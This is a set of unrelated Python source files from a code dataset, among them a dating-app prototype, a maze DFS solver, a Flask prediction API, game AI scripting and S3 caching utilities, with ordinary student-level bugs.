random selection of x and y for the digits to be placed\n random_x = random.randint(-int(width_background * .5), int(width_background * .5))\n random_y = random.randint(-int(height_background * .5), int(height_background* .75))\n\n if random_y < 0: # if the random y is below 0 part of the top of the digits is cut off\n mask_digits = mask_digits[-random_y:height, :]\n img_digits = img_digits[-random_y:height, :]\n height, width = img_digits.shape[:2]\n random_y = 0\n\n if random_x < 0:\n mask_digits = mask_digits[:, -random_x:width]\n img_digits = img_digits[:, -random_x:width]\n height, width = img_digits.shape[:2]\n random_x = 0\n\n if random_x + width <= width_background and random_y + height <= height_background:\n background[random_y:random_y + height, random_x:random_x + width] = background[random_y:random_y + height,\n random_x:random_x + width]\\\n * (1 - mask_digits)\n background[random_y:random_y + height, random_x:random_x + width] += img_digits\n\n elif random_x + width > width_background and random_y + height > height_background:\n background[\n random_y: height_background,\n random_x: width_background] = background[\n random_y: height_background,\n random_x: width_background] * (1 - mask_digits)[\n 0:(height_background - random_y),\n 0:(width_background - random_x)\n ]\n\n background[random_y:height_background, random_x:width_background] += img_digits[\n 0:(height_background - random_y),\n 0:(width_background - random_x)]\n elif random_x + width > width_background:\n background[random_y:random_y + height, random_x:width_background] = background[\n random_y:random_y + height,\n random_x:width_background\n ] * (1 - mask_digits)[\n :,\n 0:(width_background - random_x)\n ]\n background[random_y:random_y + height, random_x:width_background] += img_digits[\n :, 0:(width_background - random_x)]\n else:\n background[random_y:height_background, random_x:random_x + width] = background[\n random_y:height_background,\n random_x:random_x + width\n ] * (1 - mask_digits)[\n 0:(height_background - random_y),\n :\n ]\n background[random_y:height_background, random_x:random_x + width] += img_digits[\n 0:(height_background - random_y),\n :]\n\n background = cv2.GaussianBlur(background, (3, 3), 3)\n return background, name\n\n\nif __name__ == '__main__':\n # Run the script to generate the templates\n Y = 250\n X = 150\n\n if os.path.exists(DATA_DIR_RESULTS):\n shutil.rmtree(DATA_DIR_RESULTS)\n os.mkdir(DATA_DIR_RESULTS)\n else:\n os.mkdir(DATA_DIR_RESULTS)\n\n for i in range(100):\n base_array = create_background(Y, X)\n result, digit = place_digits(base_array, int(X * .75), int(Y * .75))\n\n cv2.imwrite(str(DATA_DIR_RESULTS) + \"//\" + digit[0] + \"_iteration_\" + str(i) + \".jpg\", result)\n","sub_path":"image_processing/digit/digit_templates/random_digit_templates.py","file_name":"random_digit_templates.py","file_ext":"py","file_size_in_byte":11388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"83037377","text":"import App\ndef CreateAI(pShip):\n\t#########################################\n\t# Creating PlainAI Call_VentureTakingDamage at (112, 188)\n\tpCall_VentureTakingDamage = App.PlainAI_Create(pShip, \"Call_VentureTakingDamage\")\n\tpCall_VentureTakingDamage.SetScriptModule(\"RunScript\")\n\tpCall_VentureTakingDamage.SetInterruptable(1)\n\tpScript = pCall_VentureTakingDamage.GetScriptInstance()\n\tpScript.SetScriptModule(\"Maelstrom.Episode6.E6M1.E6M1\")\n\tpScript.SetFunction(\"VentureTakingDamage\")\n\t# Done creating PlainAI Call_VentureTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI HullTakingDamage at (114, 265)\n\t## Conditions:\n\t#### Condition HullAt80\n\tpHullAt80 = App.ConditionScript_Create(\"Conditions.ConditionSystemBelow\", \"ConditionSystemBelow\", pShip.GetName(), App.CT_HULL_SUBSYSTEM, 0.50)\n\t## Evaluation function:\n\tdef EvalFunc(bHullAt80):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif (bHullAt80):\n\t\t\treturn ACTIVE\n\t\treturn DORMANT\n\t## The ConditionalAI:\n\tpHullTakingDamage = App.ConditionalAI_Create(pShip, \"HullTakingDamage\")\n\tpHullTakingDamage.SetInterruptable(1)\n\tpHullTakingDamage.SetContainedAI(pCall_VentureTakingDamage)\n\tpHullTakingDamage.AddCondition(pHullAt80)\n\tpHullTakingDamage.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI HullTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack4Galor6 at (127, 77)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack4Galor6 = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 6\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack4Galor6\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack4Galor5 at (213, 78)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack4Galor5 = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 5\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack4Galor5\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack4RemainingTargets at (307, 81)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack4RemainingTargets = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 7\", \"Keldon 2\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack4RemainingTargets\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI FirstWaveTargets at (227, 260)\n\tpFirstWaveTargets = App.PriorityListAI_Create(pShip, \"FirstWaveTargets\")\n\tpFirstWaveTargets.SetInterruptable(1)\n\t# SeqBlock is at (221, 177)\n\tpFirstWaveTargets.AddAI(pBasicAttack4Galor6, 1)\n\tpFirstWaveTargets.AddAI(pBasicAttack4Galor5, 2)\n\tpFirstWaveTargets.AddAI(pBasicAttack4RemainingTargets, 3)\n\t# Done creating PriorityListAI FirstWaveTargets\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack3Galors at (406, 114)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack3Galors = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 8\", \"Galor 9\", \"Galor 13\", \"Galor 14\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack3Galors\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttack3Keldon at (511, 113)\n\timport AI.Compound.BasicAttack\n\tpBasicAttack3Keldon = AI.Compound.BasicAttack.CreateAI(pShip, \"Keldon 3\", \"Keldon 21\", \"Keldon 22\", Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttack3Keldon\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI SecondWaveTargets at (340, 254)\n\tpSecondWaveTargets = App.PriorityListAI_Create(pShip, \"SecondWaveTargets\")\n\tpSecondWaveTargets.SetInterruptable(1)\n\t# SeqBlock is at (462, 204)\n\tpSecondWaveTargets.AddAI(pBasicAttack3Galors, 1)\n\tpSecondWaveTargets.AddAI(pBasicAttack3Keldon, 2)\n\t# Done creating PriorityListAI SecondWaveTargets\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI PriorityList at (109, 350)\n\tpPriorityList = App.PriorityListAI_Create(pShip, \"PriorityList\")\n\tpPriorityList.SetInterruptable(1)\n\t# SeqBlock is at (241, 357)\n\tpPriorityList.AddAI(pHullTakingDamage, 1)\n\tpPriorityList.AddAI(pFirstWaveTargets, 2)\n\tpPriorityList.AddAI(pSecondWaveTargets, 3)\n\t# Done creating PriorityListAI PriorityList\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (17, 355)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pPriorityList)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode6/E6M1/E6M1_AI_Venture_Ona.py","file_name":"E6M1_AI_Venture_Ona.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"350307867","text":"import csv\n\nglobal strengthslist\nstrengthslist=[\"patience\",\"efficiency\",\"sensitivity\",\"frankness\",\"submissiveness\",\"leadership\",\"timekeeping\",\"laidback\"]\n\ndef mainmenu():\n while True:\n print(\"\"\"\n ============MAIN MENU================\n *Find the love of your life*\n 1. Register\n 2. Login\n 3. Quit\n \"\"\")\n \n x=input(\"Enter choice:\")\n if int(x)==1:\n register()\n break\n elif int(x)==2:\n login()\n break\n elif int(x)==3:\n print(\"Goodbye then!\")\n break\n \n\ndef register():\n print(\"===Register====\")\n print(\"First things first, sign up and tell us a little about yourself\")\n with open(\"dating.txt\",\"a\") as fo: \n writer=csv.writer(fo) \n firstname=input(\"Enter first name:\")\n lastname=input(\"Enter last name:\")\n username=firstname+lastname[0]+\"bird\"\n print(\"Your automatically generated username is:\",username)\n password=input(\"Enter password:\")\n gender=input(\"Enter gender\")\n email=input(\"Enter email:\")\n dob=input(\"Enter date of birth in format dd/mm/yy:\")\n beliefs=input(\"Enter beliefs\")\n strengthslist=[\"patience\",\"efficiency\",\"sensitivity\",\"frankness\",\"submissiveness\",\"leadership\",\"timekeeping\",\"laidback\"]\n print(strengthslist)\n strengths=input(\"Enter your top strength: (select from the above list)\")\n contactcount=0\n writer.writerow([username,password,firstname,lastname,gender,email,dob,beliefs,strengths,contactcount])\n print(\"written to file\")\n mainmenu()\n\n\ndef login():\n print(\"===Welcome to the Dating System prototype====\")\n global notloggedin\n notloggedin=True \n\n while notloggedin==True: \n with open(\"dating.txt\",\"r\") as f:\n username=input(\"Enter username:\")\n password=input(\"Enter password:\")\n reader=csv.reader(f)\n for row in reader:\n for field in row:\n if field==username and row[1]==password:\n notloggedin=False\n else:\n break\n if notloggedin==True: \n print(\"Try again\")\n else:\n print(\"=====Access Granted! Ready to date?!======\")\n profile(username)\n\ndef profile(username):\n print()\n print()\n print(\"------Welcome to your profile---------\")\n print()\n print()\n with open(\"dating.txt\",newline=\"\") as f:\n reader=list(csv.reader(f))\n temporarylist=enumerate(reader)\n for idx, row in temporarylist:\n for field in row:\n if field==username:\n username_index = idx\n print(username_index)\n print(\"Welcome,\",field)\n wavedcount=int(reader[username_index][9])\n print(\"Waved at:\",wavedcount)\n waved=int(input(\"How many potential dates have you waved at this week?\"))\n wavedcount=wavedcount+waved\n print(\"Waved-at count:\",waved)\n ##ADDING ABILITY TO UPDATE contactcount variable in the file\n temporarylist=[]\n updatedlist=[]\n with open(\"dating.txt\",newline=\"\") as f:\n reader=list(csv.reader(f))\n temporarylist=reader #store copy of the file contents here\n for row in reader: #for every row in the file\n for field in row:\n if field==username:\n updatedlist.append(row)\n updatedlist[0][9]=int(updatedlist[0][9])+waved\n updatecontactcount(updatedlist,temporarylist)\n\ndef updatecontactcount(updatedlist,temporarylist):\n for index, row in enumerate(temporarylist):\n for field in row:\n if field==updatedlist[0]:\n temporarylist[index]=updatedlist #replace old record with updated records\n with open(\"dating.txt\",\"w\",newline=\"\") as f:\n Writer=csv.writer(f)\n Writer.writerows(temporarylist)\n print(\"File has been updated\")\n print(\"People you have waved at:\",updatedlist[0][9])\n print(\"-------What next?-----------\") \n choice=input(\"Enter S to start searching or M if you want us to find you a match!\")\n if choice==\"s\" or choice==\"S\":\n search()\n elif choice==\"M\" or choice==\"m\":\n matchmagic()\n \ndef search(): \n print(\"====Search Menu======\")\n print(\"\"\"\n 1. Search by Gender\n 2. Search by Date\n 3. Search by key word\n 4. Return to Main Menu\n \"\"\")\n choice=input(\"What would you like to do?:\")\n if int(choice)==1:\n gender()\n elif int(choice)==2:\n date()\n elif int(choice)==3:\n keyword()\n elif int(choice)==4:\n mainmenu()\n\ndef gender():\n print(\"==Search by Gender==\")\n with open(\"dating.txt\",\"r\") as f: \n gender=input(\"Enter the gender you are looking for:\")\n reader=csv.reader(f)\n for row in reader:\n for field in row:\n if field==gender:\n print(row)\n \n search()\n\ndef keyword():\n wordfound=False\n print(\"===Search by Key word===\")\n while wordfound==False: \n with open(\"dating.txt\",\"r\") as f:\n keyword=input(\"Enter keyword:\")\n reader=csv.reader(f)\n for row in reader:\n for field in row:\n if field==keyword:\n print(row)\n wordfound=True \n search()\n\ndef date():\n pass \n\ndef matchmagic():\n wordfound=False\n print(\"===Creating Match===\")\n while wordfound==False: \n with open(\"dating.txt\",\"r\") as f:\n keystrength=input(\"Enter one of your key strengths:\")\n print()\n print()\n print(\"Printing potential --true love-- matches!\")\n reader=csv.reader(f)\n for row in reader:\n if row[8] != keystrength: \n print(row)\n wordfound=True\n \n search()\n \nmainmenu()\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"154557697","text":"import tornado.httpserver\r\nimport tornado.ioloop\r\nimport tornado.options\r\nimport tornado.web\r\n\r\nfrom tornado.options import define,options\r\n\r\ndefine('port',default=8000,help='run port',type=int)\r\n\r\nclass IndexHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('01index.html')\r\n\r\n def post(self):\r\n username = self.get_argument('name','no')\r\n passwd = self.get_argument('password','no')\r\n self.render('02tmep_index.html',username=username)\r\n\r\nclass TempHandler(tornado.web.RequestHandler):\r\n def haha(self):\r\n return '这里是tornado'\r\n\r\n def get(self):\r\n username = self.get_argument('name','no')\r\n import time\r\n li = ['a','b','c','d']\r\n self.render('02tmep_index.html',\r\n username=username,\r\n time=time,\r\n haha=self.haha,\r\n li=li\r\n )\r\n\r\n\r\nif __name__ == '__main__':\r\n tornado.options.parse_command_line()\r\n\r\n app = tornado.web.Application(\r\n handlers=[\r\n (r'/index',IndexHandler),\r\n (r'/temp',TempHandler),\r\n ],\r\n template_path='templates',\r\n static_path='static',\r\n debug=True,\r\n )\r\n http_server = tornado.httpserver.HTTPServer(app)\r\n http_server.listen(options.port)\r\n tornado.ioloop.IOLoop.instance().start()","sub_path":"tornado/lesson/03templates.py","file_name":"03templates.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"63364060","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n count = 0\n if word == '':\n return count\n # check if first letter is t\n ## check is second is h\n elif word[0] == 't' and len(word) >= 2 and word[1] == 'h':\n ## increment count\n count += 1\n new_word = word.replace(word[0] + word[1], '', 1)\n count += count_th(new_word)\n # remove first letter from word and call count_th(word)\n else:\n new_word = word.replace(word[0], '', 1)\n count += count_th(new_word)\n\n return count\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"52870887","text":"from math import sqrt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nfrom csv import reader\nfrom math import sqrt\nimport random\nimport pygame\nimport random\nimport sys\nimport math\nfrom collections import deque\nfrom queue import LifoQueue\n\n\n\n\n# region SearchAlgorithms\nclass Node:\n id = None # Unique value for each node.\n up = None # Represents value of neighbors (up, down, left, right).\n down = None\n left = None\n right = None\n previousNode = None # Represents value of neighbors.\n\n def __init__(self, value):\n self.value = value\n\n\nclass SearchAlgorithms:\n ''' * DON'T change Class, Function or Parameters Names and Order\n * You can add ANY extra functions,\n classes you need as long as the main\n structure is left as is '''\n path = [] # Represents the correct path from start node to the goal node.\n fullPath = [] # Represents all visited nodes from the start node to the goal node.\n\n maze = \"\"\n rows_num = 1\n columns_num = 0\n\n def __init__(self, mazeStr):\n ''' mazeStr contains the full board\n The board is read row wise,\n the nodes are numbered 0-based starting\n the leftmost node'''\n self.maze = mazeStr\n\n def convert_to_2Darray(self):\n for i in range(len(self.maze)):\n if (self.maze[i] == ' '):\n self.rows_num += 1\n for i in range(len(self.maze)):\n if (self.maze[i] == ' '):\n break\n if (self.maze[i] != ','):\n self.columns_num += 1\n\n arr2D = np.array([[str(j) for j in i.split(',')] for i in self.maze.split(' ')])\n\n return arr2D\n\n def create_nodes(self):\n\n arr = self.convert_to_2Darray()\n\n node_list = []\n\n for i in range(self.rows_num):\n row = []\n for j in range(self.columns_num):\n nod = Node(0)\n row.append(nod)\n node_list.append(row)\n\n for i in range(self.rows_num):\n for j in range(self.columns_num):\n node_list[i][j].value = arr[i][j]\n\n counter2 = 0\n\n for i in range(self.rows_num):\n for j in range(self.columns_num):\n node_list[i][j].id = counter2\n counter2 += 1\n\n for i in range(self.rows_num):\n for j in range(self.columns_num):\n\n if (j == 0):\n node_list[i][j].left = None\n else:\n node_list[i][j].left = node_list[i][j - 1].id\n if (i == 0):\n node_list[i][j].up = None\n else:\n node_list[i][j].up = node_list[i - 1][j].id\n if (i == self.rows_num - 1):\n node_list[i][j].down = None\n else:\n node_list[i][j].down = node_list[i + 1][j].id\n if (j == self.columns_num - 1):\n node_list[i][j].right = None\n else:\n node_list[i][j].right = node_list[i][j + 1].id\n return node_list\n\n def DFS(self):\n node_list_maze = self.create_nodes()\n stack = []\n i = 0\n j = 0\n start_position = node_list_maze[0][0]\n node_list_maze[0][0].previousNode = -1\n\n stack.append(start_position)\n while len(stack) != 0:\n current_position = stack.pop()\n self.fullPath.append(current_position.id)\n i = current_position.id // self.columns_num\n j = current_position.id % self.columns_num\n\n if (current_position.value == 'E'):\n\n break\n\n if (current_position.right != None and node_list_maze[i][ j + 1].value != '#' and current_position.right not in self.fullPath):\n node_list_maze[i][j + 1].previousNode = current_position.id\n stack.append(node_list_maze[i][j + 1])\n\n if (current_position.left != None and node_list_maze[i][j - 1].value != '#' and current_position.left not in self.fullPath):\n node_list_maze[i][j - 1].previousNode = current_position.id\n stack.append(node_list_maze[i][j - 1])\n\n if (current_position.down != None and node_list_maze[i + 1][j].value != '#' and current_position.down not in self.fullPath):\n node_list_maze[i + 1][j].previousNode = current_position.id\n stack.append(node_list_maze[i + 1][j])\n\n if (current_position.up != None and node_list_maze[i - 1][ j].value != '#' and current_position.up not in self.fullPath):\n node_list_maze[i - 1][j].previousNode = current_position.id\n stack.append(node_list_maze[i - 1][j])\n\n\n # get path = direct path\n first = self.fullPath[0]\n self.path.append(first)\n\n for k in range(1, len(self.fullPath)):\n m = first // self.columns_num\n n = first % self.columns_num\n if (first < self.fullPath[k]):\n self.path.append(self.fullPath[k])\n first = self.fullPath[k]\n else:\n\n first_node = node_list_maze[m][n]\n\n if (self.fullPath[k]!=first_node.left and first_node.up != self.fullPath[k]):\n self.path.pop()\n previous_of_first = first_node.previousNode\n\n m1 = previous_of_first // self.columns_num\n n1 = previous_of_first % self.columns_num\n previous_node_of_first = node_list_maze[m1][n1]\n\n\n while first_node.previousNode > self.fullPath[k] and previous_node_of_first.left != self.fullPath[k] \\\n and previous_node_of_first.up != self.fullPath[k]:\n if (len(self.path) != 0):\n y = self.path.pop()\n m2 = y // self.columns_num\n n2 = y % self.columns_num\n first_node = node_list_maze[m2][n2]\n\n m1 = first_node.previousNode // self.columns_num\n n1 = first_node.previousNode % self.columns_num\n previous_node_of_first = node_list_maze[m1][n1]\n self.path.append(self.fullPath[k])\n first = self.fullPath[k]\n else:\n\n self.path.append(self.fullPath[k])\n first = self.fullPath[k]\n return self.fullPath, self.path\n\n\n# endregion\n\n#################################### Algorithms Main Functions #####################################\n# region Search_Algorithms_Main_Fn\ndef SearchAlgorithm_Main():\n searchAlgo = SearchAlgorithms('S,.,.,#,.,.,. .,#,.,.,.,#,. .,#,.,.,.,.,. .,.,#,#,.,.,. #,.,#,E,.,#,.')\n fullPath, path = searchAlgo.DFS()\n print('**DFS**\\n Full Path is: ' + str(fullPath) +'\\n Path is: ' + str(path))\n\n# endregion\n\n######################## MAIN ###########################33\nif __name__ == '__main__':\n\n SearchAlgorithm_Main()\n","sub_path":"MazeGame.py","file_name":"MazeGame.py","file_ext":"py","file_size_in_byte":7118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"422551726","text":"from flask import Flask, request\r\nimport numpy as np\r\nfrom flask import Flask,request\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nimport flasgger\r\nfrom flasgger import Swagger\r\n\r\napp=Flask(__name__)\r\nSwagger(app)\r\n\r\npickle_in = open(\"lr.pkl\",\"rb\")\r\nclassifier=pickle.load(pickle_in)\r\n\r\n@app.route('/')\r\ndef welcome():\r\n return \"Welcome All\"\r\n\r\n@app.route('/predict',methods=[\"Get\"])\r\ndef predict_note_authentication():\r\n \r\n \"\"\"Let's Predict Bankruptcy \r\n ---\r\n parameters: \r\n - name: Net worth/Assets\r\n in: query\r\n type: number\r\n required: true\r\n - name: Persistent EPS in the Last Four Seasons\r\n in: query\r\n type: number\r\n required: true\r\n - name: Net profit before tax/Paid-in capital\r\n in: query\r\n type: number\r\n required: true\r\n - name: Borrowing dependency\r\n in: query\r\n type: number\r\n required: true\r\n - name: Net Income to Stockholder's Equity\r\n in: query\r\n type: number\r\n required: true\r\n responses:\r\n 200:\r\n description: The output values\r\n \r\n \"\"\"\r\n var1=float(request.args.get(\"Net worth/Assets\"))\r\n var2=float(request.args.get(\"Persistent EPS in the Last Four Seasons\"))\r\n var3=float(request.args.get(\"Net profit before tax/Paid-in capital\"))\r\n var4=float(request.args.get(\"Borrowing dependency\"))\r\n var5=float(request.args.get(\"Net Income to Stockholder's Equity\"))\r\n prediction=classifier.predict([[var1,var2,var3,var4,var5]])\r\n if prediction==1:\r\n return \"The company is going to be bankrupt!!\"\r\n return \"The company is safe. :)\"\r\n\r\n\r\nif __name__=='__main__':\r\n app.run(host='0.0.0.0')","sub_path":"flask_test2.py","file_name":"flask_test2.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"77255880","text":"# Copyright (c) 2018 The Regents of the University of Michigan\n# and the University of Pennsylvania\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\nFunctions for caching data for MORF jobs.\n\"\"\"\n\nimport os\nimport subprocess\nfrom urllib.parse import urlparse\nimport logging\n\nlogger = logging.getLogger()\n\ndef cache_s3_to_local(bucket, local_dest):\n \"\"\"\n Cache all data in an s3 bucket to local_dest, creating a complete copy of files and directory structure.\n :param bucket: path to s3 bucket.\n :param local_dest: local destination to cache to (string). If it does not exist, it will be created.\n :return:\n \"\"\"\n # check paths\n s3_url = urlparse(bucket)\n assert s3_url.scheme == \"s3\", \"specify a valid path to an s3 bucket\"\n # create local_dest directory if not exists\n if not os.path.exists(local_dest):\n try:\n os.makedirs(local_dest)\n except exception as e:\n logger.error(\"error creating cache: {}\".format(e))\n raise\n # execute s3 sync command\n cmd = \"aws s3 sync {} {}\".format(bucket, local_dest)\n logger.info(\"running {}\".format(cmd))\n subprocess.call(cmd, shell=True)\n return\n\n\ndef update_morf_job_cache(job_config):\n \"\"\"\n Update the raw data cache using the parameters in job_config; if job_config contains multiple raw data buckets, cache all of them.\n :param job_config: MorfJobConfig object.\n :return:\n \"\"\"\n job_cache_dir = job_config.cache_dir\n # cache each bucket in a named directory within job_cache_dir\n for raw_data_bucket in job_config.raw_data_buckets:\n s3bucket = \"s3://{}\".format(raw_data_bucket)\n bucket_cache_dir = os.path.join(job_cache_dir, raw_data_bucket)\n cache_s3_to_local(s3bucket, bucket_cache_dir)\n return","sub_path":"morf-python-api/build/lib/morf/utils/caching.py","file_name":"caching.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"234959557","text":"import tensorflow as tf\nimport numpy as np\nfrom _collections import defaultdict\nimport matplotlib.pyplot as plt\nimport itertools\n\ndef _setupRandomSeed():\n SEED = [None]\n def setSeed(seed=None):\n seed = SEED[0] if seed is None else seed\n SEED[0] = seed\n \n np.random.seed(seed)\n return\n \n return setSeed\n\nsetupRandomSeed = _setupRandomSeed()\n\ndef setup(MAX_GPU_MEMORY, RANDOM_SEED):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=MAX_GPU_MEMORY)]\n )\n setupRandomSeed(RANDOM_SEED)\n\ndef saveMetrics(metrics, filepath, startEpoch=0):\n collectedData = defaultdict(dict)\n for dataName, values in metrics.items():\n name = dataName.replace('val_', '')\n metricKind = 'test' if dataName.startswith('val_') else 'train'\n collectedData[name][metricKind] = list(values)\n \n for name, data in collectedData.items():\n plt.clf()\n fig = plt.figure()\n axe = fig.subplots(ncols=1, nrows=1)\n for nm, values in data.items():\n axe.plot(values[startEpoch:], label=nm)\n \n axe.title.set_text(name)\n axe.set_ylabel(name)\n axe.set_xlabel('epoch')\n axe.legend(loc='upper left')\n fig.savefig(filepath('%s.png' % name))\n plt.close(fig)\n \n return\n\ndef plot_confusion_matrix(\n cm,\n target_names,\n saveTo,\n title='Confusion matrix',\n onlyErrors=False\n):\n plt.clf()\n accuracy = np.trace(cm) / float(np.sum(cm))\n misclass = 1 - accuracy\n # mask out diagonal\n if onlyErrors:\n for i in range(cm.shape[0]):\n cm[i, i] = 0\n\n plt.figure(figsize=(8, 6))\n plt.imshow(cm, interpolation='nearest', cmap=plt.get_cmap('Blues'))\n plt.title('%s (accuracy=%0.4f; misclass=%0.4f)' % (title, accuracy, misclass))\n plt.colorbar()\n\n if target_names is not None:\n tick_marks = np.arange(len(target_names))\n plt.xticks(tick_marks, target_names, rotation=45)\n plt.yticks(tick_marks, target_names)\n\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n text = str(cm[i, j])\n if onlyErrors:\n if (cm[i, j] <= 0.0) or (i == j):\n text = ''\n \n color = \"white\" if cm[i, j] > thresh else \"black\"\n plt.text(j, i, text, horizontalalignment=\"center\", color=color)\n continue\n \n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(saveTo)\n plt.close()\n return\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"286873407","text":"lineOne = input()\r\nlineTwo = input()\r\nlenOne, lenTwo = len(lineOne), len(lineTwo)\r\nlcs = {} #[lcs의 길이, lineTwo에서 lcs의 마지막 원소에 해당하는 index]\r\nfor i in range(lenOne):\r\n for j in range(lenTwo):\r\n if lineOne[i] == lineTwo[j]:\r\n if i == 0:\r\n lcs[0].append([1,j])\r\n break\r\n tmp = [1,j]\r\n lcs.append(tmp)\r\n for tup in lcs[::-1]:\r\n if tup[1] < j:\r\n lcs.append([tup[0]+1, j])\r\n","sub_path":"9251.py","file_name":"9251.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"612492635","text":"# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.\n\nfrom importlib import import_module\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\ndef getItemFromModule(module, item=None):\n \"\"\"Loads an item from a module. E.g.: moduleName=a.b.c is equivalent to 'from a.b import c'. If additionally\n itemName = d, this is equivalent to 'from a.b.c import d'. Returns None on failure\"\"\"\n try:\n if item is None:\n item = module.rsplit('.', maxsplit=1)[-1]\n module = module[:-(len(item) + 1)]\n return getattr(import_module(module), item)\n except:\n log.exception('Failed to import %s.%s', module, item if item else '')\n\n\ndef loadConfigurableComponent(config, basename, includeBaseConfig=True, key='impl'):\n \"\"\"Loads the given component from configuration, as defined (via 'impl') in the given basename config section.\n On failure returns None. includeBaseConfig indicates whether to supply base config section to component in\n addition to implementation specific section. The implementing component should accept a configuration argument\n (or two, if includeBaseConfig is set).\"\"\"\n if not (basename in config and\n key in config[basename] and\n config[basename][key] in config):\n log.error('%s section, \"%s\" value or \"%s\" section missing', basename, key, key)\n return\n implName = config[basename][key]\n log.debug('Loading component %s (%s)', basename, implName)\n component = getItemFromModule(implName)\n if component is None:\n return\n try:\n if includeBaseConfig:\n return component(dict(config[basename]), dict(config[implName]))\n else:\n return component(dict(config[implName]))\n except:\n log.exception('Failed to initialise %s', implName)\n return\n","sub_path":"src/Ioticiser/import_helper.py","file_name":"import_helper.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 